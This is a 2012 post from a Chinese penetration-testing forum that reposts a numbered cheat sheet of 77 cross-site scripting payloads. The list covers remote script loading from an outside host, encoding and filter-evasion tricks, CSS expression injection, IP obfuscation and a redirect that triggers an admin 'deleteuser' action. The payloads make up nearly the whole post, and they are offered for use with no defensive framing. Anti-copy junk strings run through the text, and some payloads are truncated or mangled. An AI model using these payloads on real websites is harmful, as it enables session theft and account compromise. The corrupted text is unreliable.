中国网络渗透测试联盟

标题: xss跨站脚本攻击汇总 [打印本页]
作者: admin    时间: 2012-9-5 14:56
标题: xss跨站脚本攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
  R; s; o! I/ e& y
8 R" \# Z" g; E6 a3 I+ w3 D (1)普通的XSS JavaScript注入0 r8 e7 @4 I$ t2 b
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
- ]5 s; T; |3 e1 Y" i% v$ F
9 W8 D* {! @( g; }( l6 g (2)IMG标签XSS使用JavaScript命令- E; ?8 z: H8 Q
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>: ^3 v! M& L7 e; b

! g- m$ N9 `' A4 ] (3)IMG标签无分号无引号) z$ I& F1 N2 K/ J$ Y
<IMG SRC=javascript:alert(‘XSS’)># F4 E4 F$ l' u1 W" m) X+ V
0 U$ G* r' p8 V2 _- X" l
(4)IMG标签大小写不敏感
1 `$ m9 P+ _" j <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
$ A  H' x& y& t& M- j& ^, u
2 w/ Y; q% z* v0 M( { (5)HTML编码(必须有分号)
: y' ?5 c# w8 r& t! G- c <IMG SRC=javascript:alert(“XSS”)>- B& y- ?7 w' g" M% s9 b1 o
9 b1 N- T3 [, d- v9 L8 \- r! D! c
(6)修正缺陷IMG标签
5 z9 R, H2 R: r4 V/ W  O' L <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>! w9 B" Y5 ^$ r3 y! r! E
; O% @0 P- E  y, e$ e! a9 v# |
(7)formCharCode标签(计算器)
8 U! ~" K+ P" v" p) y9 O; I/ a( C <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
$ \9 }2 x2 w! d
) b  y: ?' y: ?+ S1 z (8)UTF-8的Unicode编码(计算器)
# V" n5 e/ ]; [7 A% m <IMG SRC=jav..省略..S')>, R2 b2 z* L2 @! L

1 x7 O3 x+ F$ F4 u# E5 ? (9)7位的UTF-8的Unicode编码是没有分号的(计算器)
- M7 }8 J$ i# K7 F0 j8 M <IMG SRC=jav..省略..S')>; _7 p1 R0 c$ t& R7 t! w: N) O
" e% W" A1 }' O3 Q1 g
(10)十六进制编码也是没有分号(计算器)$ m/ K7 r( Z9 L* v8 _* r4 k3 r$ O
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
$ f) s) U+ C* {# h
0 i5 B: n' e; q  M( d9 \* o (11)嵌入式标签,将Javascript分开9 t* x# s1 F' F  n  N3 E! N5 I
<IMG SRC=”jav ascript:alert(‘XSS’);”>0 X& Q' n$ p6 }4 b+ d# u

3 A. h' s2 {& e (12)嵌入式编码标签,将Javascript分开3 z5 ?8 F5 H# t7 |2 M' K0 n
<IMG SRC=”jav ascript:alert(‘XSS’);”>
# I. J7 s3 |) v: x" s. ^: Y1 S7 @; B3 j1 I) w2 w2 L
(13)嵌入式换行符: g3 \3 K3 O8 @
<IMG SRC=”jav ascript:alert(‘XSS’);”>/ E- Q: c" r0 X* V8 H
! E' _2 {8 y; Z+ M% F( d- }  e6 L
(14)嵌入式回车
' p! @; h! D. L <IMG SRC=”jav ascript:alert(‘XSS’);”>
' `, V( \# y/ [  @
  r& _) d  D; Y# K (15)嵌入式多行注入JavaScript,这是XSS极端的例子
; b% e' P# ^) J% S <IMG SRC=”javascript:alert(‘XSS‘)”>% K+ {! @8 ]! A4 E$ U5 G

8 W) r& A* l: i; W# `% y7 {1 s (16)解决限制字符(要求同页面)0 r" X* z5 L( S
<script>z=’document.’</script>  c. o( o% R; i, p
<script>z=z+’write(“‘</script>$ s) Z$ H  C5 X  t
<script>z=z+’<script’</script>
7 B2 [0 v7 M9 g <script>z=z+’ src=ht’</script>5 I2 \4 S# I; ^/ `8 R* ~; j
<script>z=z+’tp://ww’</script>
: r! Q  v; E+ {, @8 c8 Q <script>z=z+’w.shell’</script>
6 Y" u4 |3 t3 {) P <script>z=z+’.net/1.’</script>0 W) O. v$ ]% S( w% k# J
<script>z=z+’js></sc’</script>
2 C9 e. B/ i1 | <script>z=z+’ript>”)’</script>- Y1 q; F' u# }' p( e, a4 _
<script>eval_r(z)</script>/ S- R0 L0 [; n. w
3 {! w2 F; s: T; Z& y# U
(17)空字符+ S0 l' t( L" D* [& q! V4 j: |- L
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out" P& [7 v4 P- b9 ?$ {9 S

% N( o- ^* e; {- Q: E; r (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
7 V6 O  c7 C, y2 j, ]+ s  `, S! F perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
8 ^3 g0 m0 |, h6 |5 X" Y, N/ J* }  |% m: |
(19)Spaces和meta前的IMG标签# x3 C0 w, l6 E$ V* E) u5 R7 E. Y
<IMG SRC=”   javascript:alert(‘XSS’);”>! E/ j# \- O! `: m2 O' Z
4 }/ `. ~' Q3 ], I4 p" N
(20)Non-alpha-non-digit XSS
6 ^$ ^- w8 R% ?7 h <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>+ @- h. m; f2 Y8 y
/ [$ J( z" W3 M
(21)Non-alpha-non-digit XSS to 22 U. h5 l) A3 O; @1 u# x
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
4 y. n) g1 n+ s+ Y0 u/ K: z; O8 N9 p
(22)Non-alpha-non-digit XSS to 3  X# X2 ~3 M% L
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
; }3 H) E; x8 b' p
( r- O0 ~' O1 B9 s$ I9 | (23)双开括号3 U$ A. \* Z2 K% W9 K$ k, W
<<SCRIPT>alert(“XSS”);//<</SCRIPT>7 c! l! H) Z2 H- U; `3 l3 g

0 x3 y. T/ o3 Z5 e" t (24)无结束脚本标记(仅火狐等浏览器)* ?$ T' H& a; H1 s% I
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
, W7 c( X5 o; j7 l+ ~1 U; [' H2 H/ j4 T
(25)无结束脚本标记2( p9 F3 z) L* {: b. W4 o% d# X
<SCRIPT SRC=//3w.org/XSS/xss.js>
* P$ Q5 z8 H8 X7 R  [3 s1 e; L% ]) ?# k2 k
(26)半开的HTML/JavaScript XSS8 e6 T/ l3 ~# l% `  D9 U* N) O
<IMG SRC=”javascript:alert(‘XSS’)”
+ n, X5 n, T; f( j5 Y: p: j) H( E
" {1 L: ?# _- k, B8 E (27)双开角括号1 W) w8 X5 v5 W1 [. M% ?
<iframe src=http://3w.org/XSS.html <
* x. i' C' ^  Q- K$ K, i4 I/ F- U& e9 t5 v! A' ?- t1 E+ n4 v1 ?
(28)无单引号 双引号 分号* ]0 J, Z3 s6 X  j
<SCRIPT>a=/XSS/0 K3 K( ?) Q) s9 z; P
alert(a.source)</SCRIPT>& q+ _( j) r* h' Q
* |( E# L+ p3 }0 w; r, A/ q, c' k! C
(29)换码过滤的JavaScript. o6 M% _; `8 Y$ P
\”;alert(‘XSS’);//
. k! q9 [7 c  K; `3 L9 k( C, K: G. G3 Y/ O) ~6 f) s
(30)结束Title标签0 h, O+ \; j- R" ^- l
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>/ F/ d9 n0 J  l/ I5 v
, K2 M3 N$ s  [; J' j
(31)Input Image
7 f0 p* Z5 }/ S2 W. J* S4 Y: W <INPUT SRC=”javascript:alert(‘XSS’);”>
! O# H" c: S% i* A' Q0 y: \
' G  H1 l3 C8 n  P" u (32)BODY Image
7 l5 @; u; q! A* }* L2 c <BODY BACKGROUND=”javascript:alert(‘XSS’)”>
# _8 _) S! ]) H5 }. x7 c0 B, x' R4 X2 N; {, m
(33)BODY标签: S  N8 K7 q2 t
<BODY(‘XSS’)>
7 @# c; k( q2 e+ s) w
8 }9 Z' v9 c" o' y: e (34)IMG Dynsrc
4 c6 [* S- L% ^+ ^) }5 T5 A <IMG DYNSRC=”javascript:alert(‘XSS’)”>9 S* l: a$ y+ S/ ]

' q1 r- p- [  g! V (35)IMG Lowsrc7 b3 c* Q9 O1 M
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
5 x6 \) C! \3 W/ n
0 l; m1 C/ w5 `& q (36)BGSOUND# X3 [) Y9 M, q# L+ f: z6 B9 L
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
5 T' J9 @' G& w, T; o3 i) p7 y& w, E1 g1 W3 ?
(37)STYLE sheet# j6 n, _6 e( j# K2 c6 m
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>* Q* ]) A/ w9 a3 i+ Y. H
; j! K# _& Q* E2 E7 E0 V
(38)远程样式表6 f/ Z# m$ I8 R: e' e0 B) W# B& P
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>- v* l. \6 p) m) p% z
' U9 _/ G* {; f+ D' H0 ]
(39)List-style-image(列表式)1 Q* j0 |% N) l$ v
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
$ ~& q# T4 V* N) g4 g9 x" u) o) j: M9 C  y" q2 Q, M- ~1 k* {
(40)IMG VBscript
* x, @% P7 u; U# ~" r <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
$ [! \! t% i9 w& J- t0 I& M( [" C- ~( g, L' l5 O+ y) I) a: Q
(41)META链接url
; }" Q" ?- u: Y( w3 d- n <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>' `5 Y( Z6 E1 Y& G
+ f$ \3 j& V) }' v; T
(42)Iframe& M1 V4 t. O+ w: w; E
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>/ \, ]3 t  f0 l) C
# c0 \- e& ]* Q. [% H: E
(43)Frame
* |4 J* ~# R. I! A. q/ D" |& E <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
4 X7 a& s* @9 I' s1 z; t5 I% P
) _  A* U$ l- K. {4 e* u (44)Table1 s  v" F9 A, j( q/ K4 A4 B
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
* j! U: [3 v( R
/ _' \6 l( V) v- `0 `* o0 J. { (45)TD
! R7 c8 T/ {# f6 H <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>3 y& |; {7 @& @! U7 j  J+ |' t) i- ]7 x

; w  n9 x, t# H$ P9 W+ J& j! U# ` (46)DIV background-image
; I& C" ]7 C( B& W6 u# v <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
( L3 B# \. z# C3 H- N8 V' l; m  Q( A9 W
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
2 }% D3 i% C0 Z8 n% l <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
% t% K9 K  I4 `, a8 t5 |$ d) a: Z* h
(48)DIV expression
5 d9 M1 w$ g- o- N# W3 C+ h0 @7 ^ <DIV STYLE=”width: expression_r(alert(‘XSS’));”>( ~! h' c( O9 p# M5 g" d# h
4 h0 L2 S! L0 Z9 h# z9 j0 E6 ^
(49)STYLE属性分拆表达
$ ~2 x0 U4 G2 y3 b( _ <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>9 U" _1 Q$ Y( b1 Z

' D& c* Q$ ]- H3 U! d (50)匿名STYLE(组成:开角号和一个字母开头)  s5 B: `. _+ ?( D1 ]
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>6 o# J# {  R9 q6 T# U

+ b! y3 O: q+ t- j& `, Y; D (51)STYLE background-image" l# @& c8 s5 [. J
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
' i; V% |# b0 ^( r1 G' [7 ^
, R# B4 N- a% b; ` (52)IMG STYLE方式/ \$ w. D; C: I- N2 c
exppression(alert(“XSS”))’>
) ^+ ]6 t9 G, C( @% ?) g) _+ b, A
- \0 {6 d$ E7 Z/ [& h1 v  |% j (53)STYLE background' m  F: ]& s( b2 p2 i6 M* a0 e
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
; f6 N/ G- I- U) R4 t' G: K6 Q+ [5 H7 N2 T3 x9 n9 I- _* \/ b
(54)BASE+ Y# t, o1 C& L. F' l" t
<BASE HREF=”javascript:alert(‘XSS’);//”>
; i6 f" A% U! l6 X9 c
# K7 G- R9 M6 t5 {9 O (55)EMBED标签,你可以嵌入FLASH,其中包涵XSS( b  R) ^0 P$ L& p- ?3 l
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
, b, }4 H4 R; i5 U
" e# O) F& Y0 p) _9 Y( W1 f* n (56)在flash中使用ActionScrpt可以混进你XSS的代码
( P- H1 p: _# o, k& q a=”get”;& z6 K/ u, c+ f/ f) ^
b=”URL(\”";( N) W3 z  O  K7 P0 n
c=”javascript:”;! k& F* B/ t+ X
d=”alert(‘XSS’);\”)”;9 _2 h9 D, M2 V; C0 O) k& ~
eval_r(a+b+c+d);
0 ~2 a6 @( l$ V: O* I8 r! t8 m) I+ R4 H% N
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上# @2 G4 I& w5 c7 _; `
<HTML xmlns:xss>
9 b& y7 ]9 ?5 K' J! d <?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
6 h; o% y) J# u2 c+ E! c0 `  ` <xss:xss>XSS</xss:xss>( O( Q) r* J3 F4 w$ M0 ]9 c$ O/ x
</HTML>
7 m# o" H! ~5 s- [) J7 A, l  Q# {+ F+ S9 N! k3 B0 s
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用7 j  l2 c/ w7 p5 f: Z9 P. H  }
<SCRIPT SRC=””></SCRIPT>
' i6 b3 n) D, o: x  g% ?) k6 F, u( P: }( r; d
(59)IMG嵌入式命令,可执行任意命令
7 R# X2 X4 E! u8 U& U) J# m <IMG SRC=”http://www.XXX.com/a.php?a=b”>
$ w+ v* |0 n( i0 ^& j* Y) n( _7 N) {
(60)IMG嵌入式命令(a.jpg在同服务器)
. d' Q4 ^  r0 k8 q Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser: K9 Q2 c2 g0 R' h( h3 E- h5 |
! X, k$ |, K7 L  T, k
(61)绕符号过滤2 F: H9 ^4 {5 z) E! L4 }
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>  Q2 O6 a4 y7 s' e

2 ^9 N0 T; [# U: l$ z( O) ~  Z. @ (62)
6 h3 ~) q9 {' t6 H$ s& l, o <SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>  t2 G% R9 g7 p2 f& o8 q

  D2 Y, j1 i' H# A7 `- B& c! ^$ J (63)- _. D* S7 ?$ Z  j1 \% f
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
, D& l& M* E$ Y' y+ j, H0 A8 F  F) R: b. R  y7 J: `
(64)
4 d2 Y; a1 ], C. K <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>9 r  N' l+ C5 E* ~
0 d' {3 s% f6 Z8 c5 f
(65)
) t( J" F/ @$ F$ Q& }$ j <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>6 x" H# b3 q3 w8 l

& v; R& A/ i. } (66)
$ C6 p9 k" w/ W: m) L2 m+ {6 d" H <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>! s1 [5 M" x$ u

( n. C* `5 c0 c; Y/ ?6 M" r (67), H) ]( q( p9 b8 @1 W2 h0 q# D
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>  ^8 L4 K+ R) L9 Z/ f

! K" M1 N& S# V6 ^* l( g (68)URL绕行' v1 `6 \3 u; e
<A HREF=”http://127.0.0.1/”>XSS</A>
- J, o/ Q5 Q  g: w7 u% }9 E
: L9 j# f; G4 H. i" P7 u5 {" v9 ]4 { (69)URL编码
# ^3 \/ T, x; f% d7 C" M) L# Y7 N <A HREF=”http://3w.org”>XSS</A>
  y! X+ [$ ?# I9 X7 y0 K. S( n0 G/ E8 q  ]
(70)IP十进制) l( r/ W7 X( ^5 @* Q
<A HREF=”http://3232235521″>XSS</A>+ v! V" Z! q! |8 J& p6 Q: y
4 c$ l0 ~0 ^. `; ]; x9 V) t
(71)IP十六进制4 K4 A' Y! u! w4 t, F4 K
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
2 X* I/ t4 w- d5 o5 A5 r- H7 e, W' p! Z1 e+ T+ _
(72)IP八进制2 e, `+ Q) D! d4 C
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
4 M7 ]  I' \! P2 k) W, e. w- A8 ~' a5 S! i# o8 K
(73)混合编码
, b: ~5 o+ I" j$ d7 o/ `, ? <A HREF=”h
* p0 d$ H! d- |, ` tt p://6 6.000146.0×7.147/”">XSS</A>
7 t% H, r( w( ^+ z) N5 }' V3 |. C8 W: y6 k
(74)节省[http:]% ^9 h  E" p/ ^4 |* M
<A HREF=”//www.google.com/”>XSS</A>0 ^; e, [6 }) H3 U: e& m* @
( o: }, v7 K, k! J( c4 h
(75)节省[www]
& @. I- _2 F; p" y' R  ^* `* P <A HREF=”http://google.com/”>XSS</A>3 g& Q) X  w: N, i0 ?
, b8 H3 N! N6 `$ q( ~" X" v
(76)绝对点绝对DNS
* @# M5 B. x' A: G& p% j- j$ ] <A HREF=”http://www.google.com./”>XSS</A>
7 p2 @1 z0 d8 r! y5 B0 u/ q% y9 ?' L; q' j9 f; ?
(77)javascript链接
: o& C9 G, C# u! c4 U% z: P <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2